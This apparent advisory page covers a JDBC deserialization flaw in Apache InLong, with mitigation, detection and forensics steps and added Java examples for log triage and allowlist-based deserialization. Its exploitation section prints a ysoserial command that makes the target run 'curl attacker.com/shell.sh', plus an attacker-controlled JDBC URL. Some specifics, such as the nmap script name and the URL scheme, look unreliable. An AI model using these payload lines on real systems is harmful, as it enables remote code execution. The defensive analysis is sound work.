How the CVE Works
The vulnerability (CVE-2024-26579) in Apache InLong (versions 1.13.0 to 2.1.0) stems from unsafe deserialization in JDBC request handling during verification. Attackers can exploit this by sending maliciously crafted JDBC payloads, triggering arbitrary code execution due to improper validation. This flaw is a bypass of prior fixes, allowing deserialization of untrusted data. The exploit leverages Java’s default serialization, enabling remote attackers to execute commands under the server’s context.
DailyCVE Form
Platform: Apache InLong
Version: 1.13.0 – 2.1.0
Vulnerability: JDBC Deserialization
Severity: High
Date: May 28, 2025
Prediction: Patch expected by June 10, 2025
What Undercode Says:
Exploitation:
- Payload Crafting: Use `ysoserial` to generate a malicious serialized object:
```
java -jar ysoserial.jar CommonsCollections5 'curl attacker.com/shell.sh' > payload.bin
```
- Trigger via JDBC: Send the payload via a manipulated JDBC connection string:
```
jdbc:inlong:mysql://attacker-controlled/payload.bin
```
Mitigation:
- Immediate Workaround: Disable remote JDBC sources in `inlong-agent.conf`:
```
jdbc.sources.enabled=false
```
- Patch Upgrade: Apply the fix from Apache InLong 2.2.0 or backport apache/inlong11732.
Detection:
1. Log Analysis: Search for anomalous JDBC connections:
```
grep -r "jdbc:inlong" /var/log/inlong/
```
2. Network Monitoring: Block unexpected outbound connections from InLong servers:
```
iptables -A OUTPUT -p tcp --dport 3306 -j DROP
```
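The grep above only finds lines containing a JDBC URL; the triage step that follows is deciding which of those connections point at a host the deployment does not own. The following is an added example (not code from the page or from Apache InLong) that extracts every `jdbc:` URL from constructed sample log lines and reports the ones whose host is outside an approved-host list. The log format, the host list and the `inlong:` URL prefix are assumptions for illustration.

```java
import java.net.URI;
import java.util.ArrayList;
import java.util.List;
import java.util.Set;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

/** Added example: flag JDBC URLs in InLong logs whose host is not an approved database. */
public class JdbcLogTriage {

    // Constructed sample log lines; not real InLong output.
    static final String[] SAMPLE_LOG = {
        "2025-05-28 10:01:12 INFO  JdbcVerifier - verifying jdbc:mysql://db01.internal:3306/inlong",
        "2025-05-28 10:02:40 INFO  JdbcVerifier - verifying jdbc:inlong:mysql://203.0.113.7/payload.bin",
        "2025-05-28 10:03:05 INFO  Agent - heartbeat ok",
        "2025-05-28 10:04:51 WARN  JdbcVerifier - verifying jdbc:postgresql://db02.internal:5432/metrics?ssl=true",
    };

    // Approved database hosts (assumed); in a real deployment load these from inventory.
    static final Set<String> APPROVED_HOSTS = Set.of("db01.internal", "db02.internal");

    // Any jdbc: URL up to the next whitespace. The optional "inlong:" prefix matches the page's example form.
    static final Pattern JDBC_URL = Pattern.compile("jdbc:(?:inlong:)?([a-z0-9]+)://(\\S+)");

    /** Returns the host part of the JDBC URL, or null if it cannot be parsed as a URI. */
    static String hostOf(String scheme, String rest) {
        try {
            return URI.create(scheme + "://" + rest).getHost();
        } catch (IllegalArgumentException e) {
            return null;
        }
    }

    /** Returns one finding per JDBC URL whose host is missing, unparsable, or not approved. */
    public static List<String> findSuspicious(String[] lines) {
        List<String> findings = new ArrayList<>();
        for (String line : lines) {
            Matcher m = JDBC_URL.matcher(line);
            while (m.find()) {
                String host = hostOf(m.group(1), m.group(2));
                if (host == null || !APPROVED_HOSTS.contains(host)) {
                    findings.add("unapproved JDBC host '" + host + "' in: " + line);
                }
            }
        }
        return findings;
    }

    public static void main(String[] args) {
        // With the constructed input only the 203.0.113.7 line is reported.
        findSuspicious(SAMPLE_LOG).forEach(System.out::println);
    }
}
```

Treating an unparsable host the same as an unknown one matters here: a URL built to confuse the verifier is exactly the kind of line an analyst wants surfaced rather than silently skipped.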
Code Fix:
The patch replaces unsafe `ObjectInputStream` with a validated parser:
```
// Before (vulnerable)
ObjectInputStream ois = new ObjectInputStream(input);

// After (fixed)
SafeObjectInputStream.validate(input, allowedClasses);
```
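`SafeObjectInputStream.validate` above is the page's shorthand for the fix, not a JDK class. The added example below (my own code, not the Apache InLong patch) shows the same idea with the JDK's built-in `ObjectInputFilter` (Java 9+): the stream is given an explicit allowlist of classes, every class descriptor in the object graph is checked against it before that class's `readObject` can run, and nesting depth is capped. The `JdbcVerifyRequest` type and the allowlist contents are assumptions standing in for whatever request types the real service accepts.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InvalidClassException;
import java.io.ObjectInputFilter;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.Serializable;
import java.util.Set;

/** Added example: Java deserialization restricted to an explicit class allowlist. */
public class SafeDeserializeExample {

    /** Hypothetical request type a JDBC verification endpoint would accept. */
    public static final class JdbcVerifyRequest implements Serializable {
        private static final long serialVersionUID = 1L;
        public final String url;
        public JdbcVerifyRequest(String url) { this.url = url; }
    }

    // Only these classes may appear anywhere in the incoming object graph (assumed list).
    private static final Set<String> ALLOWED = Set.of(
        JdbcVerifyRequest.class.getName(),
        String.class.getName());

    static final ObjectInputFilter FILTER = info -> {
        Class<?> c = info.serialClass();
        if (c == null) {
            // Metadata-only callback (depth, reference count, stream bytes): enforce a depth limit.
            return info.depth() > 5 ? ObjectInputFilter.Status.REJECTED
                                    : ObjectInputFilter.Status.UNDECIDED;
        }
        // Arrays are judged by their element type; anything not on the list is rejected.
        while (c.isArray()) c = c.getComponentType();
        return ALLOWED.contains(c.getName()) ? ObjectInputFilter.Status.ALLOWED
                                              : ObjectInputFilter.Status.REJECTED;
    };

    /** Hardened form: the filter runs on each class descriptor before the object is instantiated. */
    public static Object deserialize(byte[] bytes) throws IOException, ClassNotFoundException {
        try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(bytes))) {
            ois.setObjectInputFilter(FILTER);   // the vulnerable pattern is this line missing
            return ois.readObject();            // throws InvalidClassException on a rejected class
        }
    }

    public static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) { oos.writeObject(o); }
        return bos.toByteArray();
    }

    public static void main(String[] args) throws Exception {
        // A legitimate request round-trips.
        byte[] ok = serialize(new JdbcVerifyRequest("jdbc:mysql://db.internal:3306/inlong"));
        System.out.println("accepted: " + ((JdbcVerifyRequest) deserialize(ok)).url);

        // Any class outside the allowlist is refused before its readObject() runs.
        byte[] other = serialize(new java.util.ArrayList<String>());
        try {
            deserialize(other);
        } catch (InvalidClassException e) {
            System.out.println("rejected: " + e.getMessage());   // "filter status: REJECTED"
        }
    }
}
```

Two design points are worth noting. A denylist of known gadget classes is what the "prior fixes" the page mentions typically amount to, and it is bypassed as soon as a new gadget chain appears; an allowlist of the handful of types the endpoint actually expects does not have that problem. The same filter can also be installed process-wide with `ObjectInputFilter.Config.setSerialFilter`, which covers deserialization paths the application code does not call directly.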
Post-Exploit Forensics:
1. Memory Dump: Capture the JVM heap for analysis:
```
jmap -dump:live,format=b,file=heap.bin <pid>
```
2. Exploit Artifacts: Check for recently written `.bin` files in temporary storage:
```
find /tmp -name "*.bin" -mtime -1
```
Automated Scanning:
Use `nmap` to detect vulnerable instances:
```
nmap -p 8080 --script http-vuln-cve2024-26579 <target>
```
Reported By: github.com